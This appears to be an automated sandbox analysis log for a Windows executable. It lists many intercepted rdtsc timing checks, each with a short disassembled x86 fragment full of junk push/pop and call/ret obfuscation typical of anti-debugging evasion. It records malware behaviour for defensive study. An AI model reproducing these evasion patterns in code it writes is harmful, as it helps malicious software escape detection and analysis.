                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0796 second address: 12A07A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A07A2 second address: 12A07B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CD2597Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A11B3 second address: 12A11B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0F99 second address: 12A0FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F849CD25982h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1C1C second address: 12A1CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edi 0x00000008 push ebx 0x00000009 jnl 00007F849CD73E56h 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F849CD73E58h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c jnp 00007F849CD73E60h 0x00000032 call 00007F849CD73E68h 0x00000037 pop esi 0x00000038 mov edi, dword ptr [ebp+122D2E10h] 0x0000003e push 00000000h 0x00000040 js 00007F849CD73E5Eh 0x00000046 jnc 00007F849CD73E58h 0x0000004c push 00000000h 0x0000004e and edi, dword ptr [ebp+122D2C9Ch] 0x00000054 mov si, 4C45h 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jnl 00007F849CD73E56h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CA1 second address: 12A1CB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD2597Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CB3 second address: 12A1CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F849CD73E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2804 second address: 12A2818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F849C77677Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A28BA second address: 12A28BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5275 second address: 12A527B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A57B4 second address: 12A57B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A678E second address: 12A6792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6792 second address: 12A6830 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F849D367C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F849D367C78h 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007F849D367C8Bh 0x00000018 jmp 00007F849D367C85h 0x0000001d nop 0x0000001e jmp 00007F849D367C89h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F849D367C78h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 jmp 00007F849D367C86h 0x00000046 sbb ebx, 49E60B9Dh 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F849D367C83h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6830 second address: 12A6836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6836 second address: 12A683A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A78AA second address: 12A78B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A88A6 second address: 12A88AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A88AC second address: 12A88B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7B03 second address: 12A7B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A895A second address: 12A895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7B07 second address: 12A7B0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7B0D second address: 12A7B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+1244C7C7h] 0x00000012 add dword ptr [ebp+122D1C6Eh], esi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f stc 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 clc 0x00000028 mov eax, dword ptr [ebp+122D1051h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F849C776778h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D36D1h], ebx 0x0000004e push FFFFFFFFh 0x00000050 sub dword ptr [ebp+122D32B4h], ecx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7B7D second address: 12A7B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8AB7 second address: 12A8ACA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849C776778h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8ACA second address: 12A8ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AB8D2 second address: 12AB8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125AEBC second address: 125AEDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F849D367C78h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849D367C81h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125AEDB second address: 125AF06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F849C776776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007F849C776776h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b jmp 00007F849C77677Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125AF06 second address: 125AF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125AF0A second address: 125AF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ABE72 second address: 12ABEEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F849D367C76h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub ebx, dword ptr [ebp+122D2DECh] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+12457582h], esi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F849D367C78h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov bx, C602h 0x0000003b movzx edi, bx 0x0000003e xchg eax, esi 0x0000003f jp 00007F849D367C84h 0x00000045 jmp 00007F849D367C7Eh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jns 00007F849D367C89h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ABEEC second address: 12ABEF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD082 second address: 12AD087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD087 second address: 12AD0A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD1FF second address: 12AD205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD205 second address: 12AD210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2F0F second address: 12B2F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F849D367C78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 xor edi, dword ptr [ebp+122D2DECh] 0x0000002b sub dword ptr [ebp+1244C813h], ecx 0x00000031 push 00000000h 0x00000033 mov ebx, 643811B7h 0x00000038 add dword ptr [ebp+122D1C49h], ecx 0x0000003e push 00000000h 0x00000040 clc 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 pop eax 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B40C0 second address: 12B40C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B40C5 second address: 12B40D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849D367C7Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B01BB second address: 12B01C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B11A3 second address: 12B1206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F849D367C78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b stc 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 sub bx, 22A1h 0x00000038 mov eax, dword ptr [ebp+122D122Dh] 0x0000003e xor di, 5059h 0x00000043 push FFFFFFFFh 0x00000045 mov dword ptr [ebp+122D32D7h], edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1206 second address: 12B120C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B01C1 second address: 12B0270 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F849D367C78h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 xor dword ptr [ebp+122D2817h], esi 0x0000002b mov edi, dword ptr [ebp+122D3902h] 0x00000031 push dword ptr fs:[00000000h] 0x00000038 cmc 0x00000039 jmp 00007F849D367C83h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 sub dword ptr [ebp+122DB9B2h], esi 0x0000004b mov dword ptr [ebp+122D2F53h], ebx 0x00000051 mov eax, dword ptr [ebp+122D123Dh] 0x00000057 mov di, ax 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push ebx 0x0000005f call 00007F849D367C78h 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], ebx 0x00000069 add dword ptr [esp+04h], 00000015h 0x00000071 inc ebx 0x00000072 push ebx 0x00000073 ret 0x00000074 pop ebx 0x00000075 ret 0x00000076 mov edi, dword ptr [ebp+122D19ACh] 0x0000007c jmp 00007F849D367C89h 0x00000081 push eax 0x00000082 push esi 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B30E0 second address: 12B30E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B30E5 second address: 12B30EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B4F56 second address: 12B4F60 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849C776776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B30EB second address: 12B30EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B30EF second address: 12B30FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B30FE second address: 12B3102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B3102 second address: 12B3115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C77677Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B600A second address: 12B600E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B600E second address: 12B6018 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849C776776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6205 second address: 12B6209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6209 second address: 12B620D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B62B9 second address: 12B62BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEC29 second address: 12BEC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEC2F second address: 12BEC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849D367C76h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEC3A second address: 12BEC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776786h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849C776781h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEC67 second address: 12BEC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEEB5 second address: 12BEED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F849C776776h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F849C77677Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEED1 second address: 12BEEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3374 second address: 12C3378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3378 second address: 12C337E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C337E second address: 12C3384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3451 second address: 12C345F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C353F second address: 12C354F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C354F second address: 12C355E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C355E second address: 12C3565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3565 second address: 12C356F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F849D367C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C356F second address: 12C358E instructions: 0x00000000 rdtsc 0x00000002 je 00007F849C776776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F849C77677Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C358E second address: 12C3594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C36CF second address: 12C36D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C36D3 second address: 12C36E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C36E1 second address: 12C36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C36E5 second address: 12C36EF instructions: 0x00000000 rdtsc 0x00000002 js 00007F849D367C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C36EF second address: 12C36F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C86B5 second address: 12C86D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849D367C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9070 second address: 12C907C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C95F9 second address: 12C9609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F849D367C7Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9609 second address: 12C9631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F849C77677Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9631 second address: 12C963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDF7C second address: 12CDFCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C776782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F849C776787h 0x0000000e popad 0x0000000f jp 00007F849C776799h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F849C776789h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299233 second address: 129923E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F849D367C76h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129923E second address: 1299244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299244 second address: 1299248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
